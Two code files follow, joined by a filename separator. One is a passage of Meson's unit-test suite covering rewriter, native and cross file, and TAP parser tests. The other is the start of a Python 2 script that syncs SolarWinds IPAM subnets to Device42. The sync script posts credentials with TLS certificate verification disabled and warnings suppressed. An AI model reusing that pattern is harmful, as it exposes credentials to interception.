self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
    @unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non-Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
            raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
        # We may not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
                    # but we don't support that ATM so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
    This is mainly aimed at testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
    Check that the Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
swipam_d42.py
|
#!/usr/bin/env python
import sys
import os
import json
import base64
import ConfigParser
import threading
import Queue
import time
import requests
try:
requests.packages.urllib3.disable_warnings()
except:
pass
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
CONFIG = os.path.join(CURRENT_DIR,'settings.conf')
class Device42():
def __init__(self, d42_server, d42_user, d42_secret, debug, hdevice, hlabel):
self.base_url = d42_server
self.username = d42_user
self.password = d42_secret
self.debug = debug
self.hdevice = hdevice
self.hlabel = hlabel
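    # POST form-encoded data to a Device42 API endpoint using HTTP Basic auth; when debug
    # is enabled the payload, status code and response body are printed.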
def uploader(self, data, url):
payload = data
headers = {
'Authorization': 'Basic ' + base64.b64encode(self.username + ':' + self.password),
'Content-Type': 'application/x-www-form-urlencoded'
}
r = requests.post(url, data=payload, headers=headers, verify=False)
msg = unicode(payload)
msgpayload = '\t[*] POST payload: %s' % msg
if self.debug:
print msgpayload
msgstatus = '\t[+] Status code: %s' % str(r.status_code)
if self.debug:
print msgstatus
msg = str(r.text)
msgtext = '\t[*] Response: %s' % msg
if self.debug:
print msgtext
if r.status_code in (401, 403, 404, 500, 503):
print msgtext
return msg
def post_subnet(self, data, subnet):
url = self.base_url + '/api/1.0/subnets/'
msg = '\r\n[!] Posting subnet %s ' % subnet
print msg
self.uploader(data, url)
def post_ip(self, data):
url = self.base_url + '/api/ip/'
msg = '\r\n[!] Posting ip %s ' % data['ipaddress']
print msg
self.uploader(data, url)
class SwisClient():
def __init__(self, hostname, username, password, filter_broadcast):
self.url = "%s:17778/SolarWinds/InformationService/v3/Json/" % (hostname)
self.credentials = (username, password)
self.headers = {'Content-Type': 'application/json'}
self.include_broadcast = filter_broadcast
def get_data(self, payload=None):
r = requests.request('POST', self.url + 'Query',
data=json.dumps(payload),
auth=self.credentials,
headers=self.headers,
verify=False)
if r.status_code == 200:
return r.json()
def get_subnets(self):
networks = []
results = self.get_data({'query': 'SELECT address,cidr,friendlyname FROM IPAM.Subnet'})
if results:
for result in results['results']:
data = {}
name = result['friendlyname']
cidr = result['cidr']
address = result['address']
if address not in ['null', None] and cidr != 0: # prevent empty address and universal netmask
data.update({'network': address})
data.update({'mask_bits': cidr})
data.update({'name': name})
if data not in networks:
networks.append(data)
for network in networks:
net = network['network']
d42.post_subnet(network, net)
